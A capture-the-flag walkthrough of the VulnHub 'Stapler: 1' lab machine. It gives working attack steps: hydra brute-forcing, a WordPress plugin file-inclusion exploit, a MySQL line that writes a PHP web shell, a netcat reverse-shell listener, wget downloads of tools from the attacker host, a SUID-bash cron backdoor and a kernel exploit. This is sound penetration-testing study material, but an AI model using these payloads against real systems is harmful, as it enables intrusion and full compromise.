VulnHub: STAPLER: 1
VulnHub: STAPLER: 1
Apr 9·10 min read
Initial foothold
- Network discovery
nmap -sn 10.0.2.32/24
My target is 10.0.2.31.
2. Port scan
nmap -Pn 10.0.2.31nmap -Pn -p1000- 10.0.2.31
3. OS and service scan
nmap -A -p20,21,22,53,80,139,666,3306,12380 10.0.2.31
There’re services as listed:
- port 21 vsftpd w/ anonymous login
- port 22 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
- port 53 dnsmasq 2.75
- port 80 PHP cli server 5.5 or later
- port 139 netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
- port 666 doom
- port 3306 MySQL 5.7.12–0ubuntu1
- port 12380 Apache httpd 2.4.18 ((Ubuntu))
4. Vuln scan
nmap --script vuln -p20,21,22,53,80,139,666,3306,12380 10.0.2.31
Initial enumeration/searching existing exploits of each service
- port 21 vsftpd 3.0.3 w/ anonymous login
There aren’t any public exploits that I can use.
Login w/ anonymous
ftp 10.0.2.31username: anonymous
List files
ls -la
Download it
get note
Read it
cat note
Elly has FTP account.
- port 22 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
ssh 10.0.2.31
There’s a banner.
- port 53 dnsmasq 2.75
Reverse lookup
dig -x 10.0.2.31 @10.0.2.31
Nothing
- port 80 PHP cli server 5.5 or later
Nikto
nikto -h http://10.0.2.31
There’re ‘.bashrc’ and ‘.profile’.
Download ‘.bashrc’ and ‘.profile’. and read them
wget http://10.0.2.31/.bashrcwget http://10.0.2.31/.profile
cat .bashrc
Nothing
cat .profile
Further directory enumeration
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.31/ -x php,txt,html,sh,cgi -q
Nothing
- port 139 netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
I googled the existing exploit and there’s a sambacry, but I need to have a credential. I’ll leave this for a while.
opsxcq/exploit-CVE-2017-7494
Samba is a free software re-implementation of the SMB/CIFS networking protocol. Samba provides file and print services…
github.com
Enumeration
nmap -p 139 --script=smb-enum-shares.nse,smb-enum-users.nse 10.0.2.31
I can access \kathy and \tmp.
enum4linux -a 10.0.2.31 > enum4linux.txt
Read the file, I got usernames.
Save them as users.txt
Connect accessible directory, /kathy
smbclient //10.0.2.31/kathydir
cd kathy_stuffdirget to_do-list.txt
cd ../backupget vsftpd.confget wordpress-4.tar.gz
Read file
cat todo-list.txt
cat vsftpd.conf
Unzip WordPress and read its configuration file
tar -xzvf wordpress-4.tar.gzcd wordpressfind . -name '*.php' | grep configcat ./wp-config-sample.php
Nothing
- port 666 doom
nc -nv 10.0.2.31 666
There’s a file.
Connect and retrieve the file
nc -nv 10.0.2.31 666 > message.jpgls -la
Read file’s metadata
exiftool message.jpg
It’s a zip file.
Unzip it
unzip message.jpg
Open it.
Connect another accessible directory, /tmp
smbclient //10.0.2.31/tmp
It’s a program called ‘ls’, not much useful.
- port 3306 MySQL 5.7.12–0ubuntu1
I cannot access this right now.
- port 12380 Apache httpd 2.4.18 ((Ubuntu))
Nikto
nikto -h http://10.0.2.31:12380
It’s an HTTPS site.
Nikto again
nikto -h https://10.0.2.31:12380
Directory enumeration
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u https://10.0.2.31:12380/ -x php,txt,html,sh,cgi -q -k
Access the site
Access /admin112233/
Access /blogblog/
Read through every post.
Scan WordPress
wpscan --url https://10.0.2.31:12380/blogblog/ -et -ep -eu --disable-tls-checks
There’s a list of users.
save as ‘users_wp.txt’
Scan for plugin
wpscan --url https://10.0.2.31:12380/blogblog/ --disable-tls-checks --plugins-detection aggressive
I googled and came across this exploit code of ‘advanced-video-embed-videos-or-playlists’.
gtech/39646
WordPress Plugin Advanced Video 1.0 - Local File Inclusion Update - gtech/39646
github.com
Read the script and edit it to match the target.
Exploitation
- FTP Port 21 — brute-forcing
- SSH Port 22 — brute-forcing
- HTTP(S) Port 12380 — brute-forcing and public exploit
Start w/ FTP Port 21 — brute-forcing
I will use users.txt as username and password because some people use the same string to be username and password.
hydra -L users.txt -P users.txt ftp://10.0.2.31
I got the credential.
ftp 10.0.2.31username: SHayslettpassword: SHayslettls -la
Not much use right now
Next is SSH Port 22 — brute-forcing
hydra -L users.txt -P users.txt 10.0.2.31 ssh -t 4 -u -F -V
Connect
ssh [email protected]
Now, I got the shell.
Last one, HTTP(S) Port 12380 — brute-forcing and public exploit
Starting w/ brute-forcing and leave it for a while.
wpscan --url https://10.0.2.31:12380/blogblog/ --disable-tls-checks -P ~/Desktop/rockyou.txt
Using public exploit
python 39646.py
Now I got a MySQL credential.
4. MySQL port 3306
Remote login w/ root : plbkac
mysql -h 10.0.2.31 -uroot -pplbkac
I’ll create an outfile w/ the content of PHP shell command.
Normally, I’ll store the shell file within the WordPress site. So, the path probably is:
/var/www/https/blogblog/wp-content/uploads/
I’ll use MySQL command to create PHP shell.
use mysqlSelect "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";
Verify if the file exists.
Intercept the request w/ Burp Suite and send it to the repeater
Add ‘?cmd=id’ to test the shell function.
Prepare listener on port 443
rlwrap nc -lvp 443
I’ll supply a reverse shell command to the generated shell using this cheatsheet:
Reverse Shell Cheat Sheet
If you're lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards…
pentestmonkey.net
Encode to URL w/ Burp Suite’s decoder.
Supply encoded reverse shell command w/ repeater.
After many tries, I succeeded w/ this command.
Back to the listener, now I got the shell.
Privilege Escalation
I’ll continue w/ WordPress shell.
Get TTY shell
python -c ‘import pty;pty.spawn(“/bin/bash”);’
- Explore directory as listed
/opt/tmp/var/log/var/www/https//var/mail
I came across this /var/mail/www-data. There’s a PHP-mailer, but I don't know how to exploit it. Let’s skip this for a moment.
2. LinEnum.sh
Prepare attacker machine to be file server
python -m SimpleHTTPServer 80
Download, store in /tmp, change permission, and run
cd /tmpwget http://10.0.2.32/LinEnum.shchmod 777 LinEnum.sh./LinEnum.sh
These are information that I’ve found interesting.
Kernel version 4.4.0
User that can run sudo, peter
Cronjob located in ‘/etc/cron.d’
Running service, ‘cron -f’ indicating there’s running cronjob.
There’s a password in ‘.bash_history’
3. Exploit
- Login as peter and verify sudo
From LinEnum.sh result
su peterPassword: JZQuyIN5
Verify sudo
sudo -l
Change to root
sudo suwhoami
Now, I’m root.
- cronjob
From LinEnum.sh result
I will verify the path of these services
cat /etc/cron.d/logrotate
There’s ‘.sh’ script.
Verify permission
ls -la /usr/local/sbin/cron-logrotate.sh
It’s owned by root and can be edited by anyone.
Read its content
cat /usr/local/sbin/cron-logrotate.sh
Append the command to get a root shell and verify
echo "cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash" >> /usr/local/sbin/cron-logrotate.shcat /usr/local/sbin/cron-logrotate.sh
Wait for a while and verify /tmp
ls -la
Now, I got rootbash
Run it
/tmp/rootbash -p
- kernel exploitation
Verify kernel version
uname -a
This machine is Linux kernel 4.4.0 32 bit.
Search w/ searchsploit
searchsploit linux kernel 4.4
After many tries, I succeeded w/ this exploit.
Copy and read it
searchsploit -m 39772cat 39772.txt
I followed the provided link.
808 - project-zero - Project Zero - Monorail
Edit description
bugs.chromium.org
I got the exploit file.
Decompressed
tar -xvf exploit.tar
Download to target machine.
wget http:/10.0.2.32/hello.cwget http:/10.0.2.32/suidhelper.cwget http:/10.0.2.32/doubleput.cwget http:/10.0.2.32/compile.sh./compile.sh
Now, I’m root.